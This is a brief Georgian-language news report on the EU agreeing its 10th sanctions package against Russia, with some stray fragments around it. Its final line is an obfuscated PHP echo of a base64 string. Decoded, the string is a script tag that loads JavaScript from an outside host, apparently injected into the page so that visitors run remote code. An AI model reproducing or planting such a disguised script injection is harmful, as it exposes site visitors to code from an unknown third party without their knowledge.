celsiusi
ავერსი შნაიდერი
ევროკავშირის წევრებმა რუსეთის წინააღმდეგ სანქციების მე-10 პაკეტი შეათანხმეს.
როგორც ევროკავშირის საბჭოს თავმჯდომარე ქვეყანა შვედეთი იუწყება, სანქციები მკაცრ შეზღუდვებს ითვალისწინებს რუსეთში ორმაგი დანიშნულების საექსპორტო პროდუქციასა და ტექნოლოგიებზე. ასევე გაფართოვდება ე.წ. შავი სია ფიზიკური და იურიდიული პირების მიმართ, რომლებიც მხარს უჭერენ ომს და ავრცელებენ პროპაგანდას ან აწვდიან რუსეთს დრონებს.
აღსანიშნავია, რომ მე-10 პაკეტზე შეთანხმება ვერ ხერხდებოდა პოლონეთის პოზიციის გამო, რომელიც პაკეტში რუსეთთან კაუჩუკით ვაჭრობის საკითხზე სანქციების გაძლიერებას ითხოვდა.
ახლა დოკუმენტი წერილობითი პროცედურის სახით ევროკავშირის საბჭომ უნდა დაამტკიცოს, რის შედეგაც ოფიციალურ ჟურნალში გამოქვეყნდება და ძალაში შევა.
443
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");